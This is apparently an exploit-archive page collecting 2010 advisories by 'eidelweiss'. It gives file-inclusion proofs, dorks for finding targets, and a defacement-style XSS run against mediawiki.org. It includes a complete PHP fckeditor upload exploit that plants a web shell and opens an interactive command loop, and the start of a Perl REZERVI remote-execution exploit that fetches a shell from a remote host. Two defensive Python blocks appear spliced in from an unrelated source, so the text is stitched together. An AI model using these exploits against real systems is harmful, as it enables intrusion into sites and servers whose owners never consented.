1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.ddlcms.com
download: http://www.ddlcms.com/download.php
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

-=[ Vuln Code ]=-

[-] /thanks.php

include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46
include(WWWROOT . 'leftside.php');

=====================================================================

-=[ P0C ]=-

The "skin" parameter in thanks.php is not defined before use, which can allow remote attackers to execute arbitrary PHP code via a URL.

-=[ exploit ]=-

http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=========================

2010/06/01

Mediawiki (index.php) HTML Injection & unknown vulnerability issue




Vendor: www.MEDIAWIKI.ORG
download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thank`s: neogabriel a.k.a Ahmed Yusuf (who gave me the inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second)

=====================================================================

Description:

You can read the full description of MediaWiki at www.mediawiki.org :P

=====================================================================

-=[ vuln ]=-

http://127.0.0.1/wiki/index.php?title=XSS

-=[ P0C ]=-

http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss

-=[ vendor Demo P0C ]=-

http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss

redirect to

http://www.mediawiki.org/wiki/Hacked_by_eidelweiss

Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive


Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80

=========================| -=[ E0F ]=- |=========================

2010/05/30

GR Board v1.8.6.1 stab (theme) Remote File Inclusion Vulnerability





download: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

GRBoard (version 1.8) is a bulletin board system from Korea.
It is freely available for all platforms that support PHP and MySQL.
But I found a Remote File Inclusion vulnerability.

=====================================================================

-=[ Vuln C0de ]=-

[-] path/page.php

-----------------------------------------------------------------------------------------

// Load the variables used on this page
$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll');
$countList = count($getConfigList);
for($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1
?>



include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2


?>

-----------------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/page.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================

2010/05/29

Groone's Simple Contact Form (abspath) RFI Vulnerability




=====================================================================


Vendor: www.groonesworld.com
download: http://www.groonesworld.com/programs/contact/contact.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

Groone's World Development is a site dedicated to open source development; offering a wide range of mostly free php scripts that will meet your needs.


-=[ Vuln Code ]=-


[-] path/contact/contact.php
-----------------------------------------------------------------------------------

$abspath = "/home/user/public_html/contact/";

/*
This is groones contact form. It's a script that allows people to put a simple contact form on their website
It can be downloaded from http://www.groonesworld.com/
License: GPL

Thank you, Russell H. Bennett, Jr.
*/

include($abspath.'inc/settings.inc.php'); // <= 1

--------

function mailok($usermsg) {
global $abspath;
include($abspath."inc/badwords.inc.php"); // <= 2

$usermsg = strtoupper($usermsg);
$tmpbad = strtoupper($badwords);
$badwords = explode(",",$tmpbad);
$ding = "GOOD";
$i = 0;
-----------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/contact/contact.php?abspath= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================

2010/05/26

Flock web browser v2.5.6 (Remote Memory Corrupt) Crash Exploit

======================================================================
Flock web browser v2.5.6 (Remote Memory Corrupt) Crash Exploit
======================================================================



Save this script with the extension .html or .htm,
then open it with your Flock web browser.

THIS IS FOR EDUCATIONAL PURPOSES ONLY
THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE

Vendor: www.flock.com
Download: http://www.flock.com/versions

Tested on WINXP (sp2 - sp3) - WIN 7 - ibook OS X 10.4.11 - Ubuntu 9

Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Greets: [D]eal [c]yber and All Indonesian Hacker`s




2010/05/23

JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability Exploit




-----------------------------------------------------------------------------------
JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability
-----------------------------------------------------------------------------------


Vendor: www.foldergallery.jv2.net
download: http://foldergallery.jv2.net/Download/
Author: eidelweiss
Thank`s: All Friends & All Hacker`s

-----------------------------------------------------------------------------------

-=[ Vuln Code ]=-

[-] /path/gallery/gallery/popup_slideshow.php

include ("config/gallerysetup.php");
include ("config/galleryconfig.php");
include ("config/file_handling.php");
include ("config/lang/".$language.".php"); // <= 1
include ("theme/".$gallerytheme."/config.php"); // <= 2

-----------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/gallery/popup_slideshow.php?language= [LFI]

http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [LFI]

http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=========================

2010/05/22

hustoj (fckeditor) Remote Arbitrary File Upload Exploit




-----------------------------------------------------------------
hustoj (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------


Hustoj is the HUST ACM Online Judge, released under the GNU GPL v2 license
Download : http://code.google.com/p/hustoj/downloads/list
exploited by ..: eidelweiss (g1xsystem@windowslive.com)
Special thanks to : all friends & all Hacker`s

nb to: Sn!pEr.S!Te Hacker => check this out bro => http://www.hack0wn.com/view.php?xroot=1267.0&cat=exploits

details..: works against an Apache server with the mod_mime module installed (if so configured)

[-] vulnerable code in path/web/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/upload/'.date("Ym")."/" ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

With the default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code, because file names with multiple extensions are not properly checked.
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/web/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+-----------------------------------------------------------------+";
print "\n| hustoj (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+-----------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /hustoj/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\hustoj-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
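The defect both fckeditor advisories above (DM Filemanager and hustoj) rely on is that the connector checks only the final extension, while Apache's mod_mime maps every extension in the name, so 0k.php.zip is still handed to PHP. The following is an added example written for this page in Python, not code from FCKeditor or either project: it applies the allowed/denied policy to every extension component, mirrors the dot-collapsing rename that later FCKeditor connectors perform under their ForceSingleExtension setting (a setting not shown on this page), and scans constructed access-log lines for the double-extension trace the upload leaves. The allowed-extension set is shortened from the config.php listing.

```python
import re
from typing import List, Set, Tuple

# 'File' resource type lists as in the connector's config.php (shortened here).
ALLOWED_FILE_EXT: Set[str] = {"7z", "aiff", "asf", "avi", "bmp", "csv", "doc", "fla",
                              "flv", "gif", "gz", "jpg", "rtf", "tar", "xls", "zip"}
DENIED_FILE_EXT: Set[str] = set()

# Extensions that common Apache handler setups hand to an interpreter; with
# mod_mime "0k.php.zip" is still served as PHP, so none may appear anywhere.
SCRIPT_EXTENSIONS: Set[str] = {"php", "php3", "php4", "php5", "phtml", "phar",
                               "pl", "cgi", "asp", "aspx", "jsp", "shtml"}


def extensions_of(filename: str) -> List[str]:
    """Every extension component of a name, lower-cased, ignoring directories:
    'dir/0k.PHP.Zip' -> ['php', 'zip'], 'README' -> []."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return [part.lower() for part in base.split(".")[1:] if part]


def is_allowed_upload(filename: str,
                      allowed: Set[str] = ALLOWED_FILE_EXT,
                      denied: Set[str] = DENIED_FILE_EXT) -> Tuple[bool, str]:
    """Apply the allowed/denied policy to *every* extension, not just the last.
    Returns (accepted, reason)."""
    if not filename.strip() or "\x00" in filename:
        return False, "empty name or embedded NUL byte"
    exts = extensions_of(filename)
    if not exts:
        return False, "no extension"
    for ext in exts:
        if ext in SCRIPT_EXTENSIONS:
            return False, f"script extension '.{ext}' inside file name"
        if ext in denied:
            return False, f"denied extension '.{ext}'"
        if ext not in allowed:
            return False, f"extension '.{ext}' not in allowed list"
    return True, "ok"


def force_single_extension(filename: str) -> str:
    """Belt-and-braces rename modelled on the ForceSingleExtension behaviour
    of later FCKeditor connectors (assumed, not shown on this page): every dot
    but the last becomes an underscore, so 'shell.php.zip' becomes 'shell_php.zip'."""
    return re.sub(r"\.(?![^.]*$)", "_", filename)


# Apache combined-format request field, e.g. "GET /x.php.zip HTTP/1.0"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines: List[str]) -> List[str]:
    """Paths where a script extension is followed by further extensions: the
    trace an uploaded double-extension file leaves when it is invoked."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group("path").split("?", 1)[0]
        exts = extensions_of(path)
        if len(exts) >= 2 and any(ext in SCRIPT_EXTENSIONS for ext in exts[:-1]):
            hits.append(path)
    return hits


# Constructed access-log sample mirroring the request sequence of the exploit.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/May/2010:10:01:02 +0000] "POST /hustoj/web/fckeditor/'
    'editor/filemanager/connectors/php/config.php?Command=FileUpload HTTP/1.0" 200 212',
    '203.0.113.5 - - [22/May/2010:10:01:03 +0000] "GET /hustoj/0k.php.zip HTTP/1.0" 200 54',
    '198.51.100.7 - - [22/May/2010:10:02:10 +0000] "GET /hustoj/upload/201005/photo.jpg HTTP/1.1" 200 8123',
]

if __name__ == "__main__":
    for name in ("report.zip", "archive.tar.gz", "0k.php.zip", "shell.phtml.jpg"):
        print(f"{name:18} -> {is_allowed_upload(name)}")
    print("flagged:", suspicious_requests(SAMPLE_LOG))
```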

2010/05/13

Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability




========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================


Download: http://sourceforge.net/projects/aardvertiser/files/

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Description]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality.


-=[Dork]=-

inurl:/index.php?option=com_aardvertiser

-=[Exploit]=-

http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
http://localhost/index.php?option=com_aardvertiser&task= [lfi]

-=[LFI]=-

/etc/vsftpd.chroot_list
/usr/local/etc/apache/vhosts.conf

-=[ P0C ]=-

http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================

migascms "Xinha" Plugin Configuration Injection Vulnerability




================================================
migascms "Xinha" Plugin Configuration Injection Vulnerability
================================================


Download: http://www.sebrac.webcindario.com/cms/index.php?mode=downloads
Affected: MigasCMS 1.0.0
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Credits: Stefan Esser
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS (Hack0wn) , exploit-db team , [D]eal [C]yber
Greetz: Stefan Esser, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

Description:

During an audit of the Xinha WYSIWYG editor it was discovered that it contains a major security hole that allows injecting arbitrary configuration into the editor's plugins.
These plugins can usually be used by anyone without being logged into the application that uses Xinha.
By injecting an attacker-defined configuration into the ImageManager plugin it is possible to upload arbitrary files to any directory on the web server that is writable.
Often this allows uploading malicious PHP files (e.g. c99) into the document root directory. MigasCMS is one of the applications affected by this type of vulnerability.

The vulnerability is caused by a logical error in the dynamic configuration feature of the Xinha editor.
The editor allows PHP scripts to pass a new configuration to the plugins through the request variables.
The configuration is secured by a salted SHA1 hash, with the secret salt being stored in the user session.
However, due to a logical error in the verification, an attacker can force the verification to use a secret salt known to him.
This allows him to inject arbitrary configurations.

========================================================================

-=[ VULN C0de ]=-

To understand the vulnerability it is necessary to look at the config.inc.php file of the ImageManager plugin:

[-] path/cms/admin/xinha/plugins/ImageManager/config.inc.php (lines 292-323)

************************************************************************/
// Standard PHP Backend Data Passing
// if data was passed using xinha_pass_to_php_backend() we merge the items
// provided into the Config
require_once(realpath(dirname(__FILE__) . '/../../contrib/php-xinha.php'));
if($passed_data = xinha_read_passed_data())
{
  $IMConfig = array_merge($IMConfig, $passed_data);
  $IMConfig['backend_url'] .= xinha_passed_data_querystring() . '&';
}
// Deprecated config passing, don't use this way any more!
elseif(isset($_REQUEST['backend_config']))
{
  if(get_magic_quotes_gpc()) {
    $_REQUEST['backend_config'] = stripslashes($_REQUEST['backend_config']);
  }

  // Config specified from front end, check that it's valid
  session_start();
  $secret = $_SESSION[$_REQUEST['backend_config_secret_key_location']];

  if($_REQUEST['backend_config_hash'] !== sha1($_REQUEST['backend_config'] . $secret))
  {
    die("Backend security error.");
  }

  $to_merge = unserialize($_REQUEST['backend_config']);
  if(!is_array($to_merge))
  {
    die("Backend config syntax error.");
  }

  $IMConfig = array_merge($IMConfig, $to_merge);
************************************************************************/

An attacker can control the session name, which is usually PHPSESSID.
He can also choose which session variable is read, through the backend_data[key_location] variable (backend_config_secret_key_location in the code above), and he controls both the data and the hash.
The only constraint is that the chosen session variable must exist, but this is not a problem in most applications, as explained above.

========================================================================

-=[ P0C exploitation ]=-

************************************************************************/
Content-Length: 735

----------789665048
Content-Disposition: form-data; name="__plugin"

ImageManager
----------789665048
Content-Disposition: form-data; name="__function"

images
----------789665048
Content-Disposition: form-data; name="dir"

/
----------789665048
Content-Disposition: form-data; name="backend_config"

a:4:{s:10:"images_dir";s:17:"../../../uploads/";s:12:"allow_upload";b:1;s:13:"allow_new_dir";b:1;s:15:"validate_images";b:0;}
----------789665048
Content-Disposition: form-data; name="backend_config_hash"

7c4d33785daa5c2370201ffa236b427aa37c9996
----------789665048
Content-Disposition: form-data; name="backend_config_secret_key_location"

exploitdummy
----------789665048
Content-Disposition: form-data; name="upload"; filename="xXx.php";
Content-Type: xXx


----------789665048

----------789665048
************************************************************************/

Even if the web server has no writable directories, this vulnerability is critical, because overwriting the plugin configuration can also trigger other problems such as remote URL inclusion.
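To make the logical error in the sha1 check concrete, here is an added Python model of that verification, written for this page and not Xinha's or MigasCMS's own code: the vulnerable variant reads the secret from a request-chosen session slot (an unset slot is NULL in PHP and concatenates as an empty string, and a slot whose value is known works just as well), while the hardened variant pins the slot name server-side, treats a missing secret as a failure and uses an HMAC compared in constant time. The serialized config string and session contents are constructed.

```python
import hashlib
import hmac
from typing import Dict, Optional


def sha1_hex(data: str) -> str:
    return hashlib.sha1(data.encode()).hexdigest()


def verify_vulnerable(request: Dict[str, str], session: Dict[str, str]) -> bool:
    """Model of the $secret = $_SESSION[...] / sha1 check shown above. The
    request names the session slot the secret is read from; an unset slot is
    NULL in PHP and concatenates as '', so sha1(backend_config) alone passes."""
    slot = request.get("backend_config_secret_key_location", "")
    secret = session.get(slot, "")
    expected = sha1_hex(request.get("backend_config", "") + secret)
    return request.get("backend_config_hash") == expected


def forged_request_model(config: str, known_slot: Optional[str] = None,
                         known_value: str = "") -> Dict[str, str]:
    """Shape of the PoC request above, used here only to exercise the two
    checks: point at a slot that does not exist (empty secret) or at one whose
    value is known, and hash accordingly."""
    slot = known_slot if known_slot is not None else "exploitdummy"
    return {
        "backend_config": config,
        "backend_config_secret_key_location": slot,
        "backend_config_hash": sha1_hex(config + known_value),
    }


# Hardened variant: the slot name is fixed server-side (name assumed for this
# example), a missing secret is a hard failure, and the tag is an HMAC that is
# compared in constant time.
SECRET_SLOT = "xinha_backend_secret"


def sign_hardened(config: str, session: Dict[str, str]) -> Optional[str]:
    """What the legitimate front end would compute for a given session."""
    secret = session.get(SECRET_SLOT)
    if not secret:
        return None
    return hmac.new(secret.encode(), config.encode(), hashlib.sha256).hexdigest()


def verify_hardened(request: Dict[str, str], session: Dict[str, str]) -> bool:
    expected = sign_hardened(request.get("backend_config", ""), session)
    if expected is None:
        return False
    return hmac.compare_digest(expected, request.get("backend_config_hash", ""))


if __name__ == "__main__":
    cfg = 'a:1:{s:12:"allow_upload";b:1;}'  # constructed serialized config
    sess = {SECRET_SLOT: "constructed-per-session-secret", "lang": "en"}
    for req in (forged_request_model(cfg), forged_request_model(cfg, "lang", "en")):
        print("vulnerable accepts:", verify_vulnerable(req, sess),
              "| hardened accepts:", verify_hardened(req, sess))
```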

=========================| -=[ E0F ]=- |=================================

2010/05/08

Moodle 1.9.8+ ("libdir" , "dirroot") RFI Vulnerability Exploit




########################################################

[+]Title: Moodle 1.9.8+ ("libdir" , "dirroot") RFI Vulnerability
[+]Method: Remote (rfi) exploit
[+]Download: http://download.moodle.org/stable19/
[+]Discovered by: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com

[!]Thank`s To: exploit-db team , JosS (hack0wn) , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber and all my friends

########################################################

BACKGROUND :

Moodle is a Course Management System (CMS), also known as a Learning Management System (LMS) or a Virtual Learning Environment (VLE).
It is a free web application that educators can use to create effective online learning sites.

***********************

-=[Vulnerability Description]=-

Moodle v1.9.8+ is prone to a Remote File Inclusion vulnerability.

Input passed to the "libdir" and "dirroot" parameters in multiple files is not properly verified before being used to include files.
This can be exploited to execute arbitrary PHP code by including files from local or external resources (RFI), and also to disclose the full user names of other users (LFI).

Access Vector: Network exploitable
Access Complexity: High
Authentication: Not Required to exploit
Impact Type: Allows unauthorized disclosure of information

Remote: Yes
Local: Yes

-=[ Vulnerable / Affected ]=-

Moodle moodle 1.9.8+
Moodle moodle 1.9.x
Moodle moodle 1.8.x
Moodle moodle 1.7.7 and Prior
Moodle moodle 1.5.2 and Prior
Moodle moodle 1.4.3 and Prior
Moodle moodle 1.3.4 and Prior
Moodle moodle 1.2.1 and Prior
Moodle moodle 1.9 and Prior
Moodle moodle 1.7.7+
Moodle moodle 1.7
Moodle moodle 1.6.9+
Moodle moodle 1.6.1 +
Moodle moodle 1.18.2.3
Moodle moodle 1.18.2.2
RedHat Fedora 13
BEA Systems Weblogic Proxy Plugin 1.5.3 +
BEA Systems Weblogic Proxy Plugin 1.5.3
Moodle - Joomla Integration



-=[ Vuln C0de ]=-

1. Input passed to the "libdir" and "dirroot" parameters in multiple files is not properly verified before being used to include files.
This can be exploited to execute arbitrary PHP code by including files from local or external resources (RFI), and also to disclose the full user names of other users (LFI).

2. Not sanitized, not defined, and no login required for:

require_once($CFG->libdir.'/formslib.php');
***?>

(moodle/admin/uploaduser_form.php)
(moodle/admin/uploadpicture_form.php)
(moodle/blog/edit_form.php)
(moodle/course/edit_form.php)
(moodle/course/recent_form.php)
(moodle/course/moodleform_mod.php)
(moodle/course/reset_form.php)
(moodle/course/delete_category_form.php)
(moodle/course/request_form.php)
(moodle/grade/edit/letter/edit_form.php)
(moodle/grade/edit/outcome/edit_form.php)
(moodle/grade/edit/scale/edit_form.php)
(moodle/grade/edit/settings/form.php)
(moodle/grade/edit/tree/category_form.php)
(moodle/grade/edit/tree/outcomeitem_form.php)
(moodle/grade/edit/tree/calculation_form.php)
(moodle/grade/edit/tree/grade_form.php)
(moodle/grade/export/grade_export_form.php)
(moodle/grade/import/grade_import_form.php)
(moodle/login/signup_form.php)
(moodle/login/change_password_form.php)
(moodle/login/restored_password_form.php)
(moodle/mod/forum/post_form.php)
(moodle/mod/glossary/comment_form.php)
(moodle/notes/edit_form.php)
(moodle/question/contextmove_form.php)
(moodle/question/move_form.php)
(moodle/question/category_form.php)
(moodle/question/contextmoveq_form.php)
(moodle/question/export_form.php)
(moodle/question/import_form.php)

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/admin/uploaduser_form.php?libdir=
http://127.0.0.1/moodle/admin/uploadpicture_form.php?libdir=
http://127.0.0.1/moodle/blog/edit_form.php
http://127.0.0.1/moodle/course/edit_form.php
http://127.0.0.1/moodle/course/recent_form.php
http://127.0.0.1/moodle/course/moodleform_mod.php
http://127.0.0.1/moodle/course/reset_form.php
http://127.0.0.1/moodle/course/delete_category_form.php
http://127.0.0.1/moodle/course/request_form.php
http://127.0.0.1/moodle/grade/edit/letter/edit_form.php
http://127.0.0.1/moodle/grade/edit/outcome/edit_form.php
http://127.0.0.1/moodle/grade/edit/scale/edit_form.php
http://127.0.0.1/moodle/grade/edit/settings/form.php
http://127.0.0.1/moodle/grade/edit/tree/category_form.php
http://127.0.0.1/moodle/grade/edit/tree/outcomeitem_form.php
http://127.0.0.1/moodle/grade/edit/tree/calculation_form.php
http://127.0.0.1/moodle/grade/edit/tree/grade_form.php
http://127.0.0.1/moodle/grade/export/grade_export_form.php
http://127.0.0.1/moodle/grade/import/grade_import_form.php
http://127.0.0.1/moodle/login/signup_form.php
http://127.0.0.1/moodle/login/change_password_form.php
http://127.0.0.1/moodle/login/restored_password_form.php
http://127.0.0.1/moodle/mod/forum/post_form.php
http://127.0.0.1/moodle/mod/glossary/comment_form.php
http://127.0.0.1/moodle/notes/edit_form.php
http://127.0.0.1/moodle/question/contextmove_form.php
http://127.0.0.1/moodle/question/move_form.php
http://127.0.0.1/moodle/question/category_form.php
http://127.0.0.1/moodle/question/contextmoveq_form.php
http://127.0.0.1/moodle/question/export_form.php
http://127.0.0.1/moodle/question/import_form.php

########################################################

-=[ Other Vuln C0de ]=-

[-] moodle/lib/textlib.class.php

/// Required files
require_once($CFG->libdir.'/typo3/class.t3lib_cs.php'); // line 28
require_once($CFG->libdir.'/typo3/class.t3lib_div.php'); // line 29

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/lib/textlib.class.php?libdir= [inj3ct0r shell]

########################################################
[-] moodle/group/group_form.php

require_once($CFG->dirroot.'/lib/formslib.php'); // line 3

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/group/group_form.php?dirroot= [inj3ct0r shell]

########################################################

-=[ Other Vuln C0de ]=-


[-] moodle/my/pagelib.php

require_once($CFG->libdir.'/pagelib.php'); // line 3

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/my/pagelib.php?libdir= [sh3ll inj3ct0r]

########################################################

-=[ Other Vuln C0de ]=-

[-] /moodle/tag/pagelib.php


require_once($CFG->libdir.'/pagelib.php'); // line 3
require_once('lib.php');

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/tag/pagelib.php?libdir= [inj3ct0r sh3ll]

########################################################

[-] moodle/course/editcategory_form.php

require_once ($CFG->dirroot.'/course/moodleform_mod.php'); // line 2

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/course/editcategory_form.php?dirroot= [sh3ll inj3ct0r]

*********************** etc, etc, etc, ***********************

####################=[E0F]=####################

2010/05/07

REZERVI 3.0.2 Remote Command Execution Exploit




#!/usr/bin/perl
####################################################################
# REZERVI 3.0.2 Remote Command Execution Exploit
# download: http://www.rezervi.com/downloads/rezervi3_0_2.zip
#
# Author: JosS & Randy Arios a.k.a eidelweiss
# mail: eidelweiss[at]cyberservices[dot]com
# blog: http://eidelweiss-advisories.blogspot.com
# Greetz: Inj3ct0r Team - YOGYACARDERLINK - devilzc0de - JosS [hack0wn] - exploit-db team
#
# INDONESIAN HACKER still R0CK!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
# OUTPUT: (tested on localhost)
#
# [shell]:~$ id
# uid=80(apache) gid=80(apache) groups=80(apache)
# [shell]:~$ uname -a
# Linux localhost 2.6.29-grsec #2 SMP Fri Aug 14 21:37:03 PDT 2009 i686 GNU/Linux
# [shell]:~$ exit
# localhost:/home/eidelweiss/Desktop#


use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
&clear();
print "[x] REZERVI 3.0.2 Remote Command Execution Exploit\n";
print "[x] Written By eidelweiss\n";
print "[x] eidelweiss[at]cyberservices[dot]com\n\n";
print "[+] Usage:\n";
print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n";
print "[+] eX: $0 -vuln \"http://localhost/PATH/\" -shell \"http://yourweb/inj3ct0r/sh3ll.txt?\"\n\n";
exit();
}

my $options = GetOptions (
'help!' => \$help,
'vuln=s' => \$vuln,
'shell=s' => \$shell
);

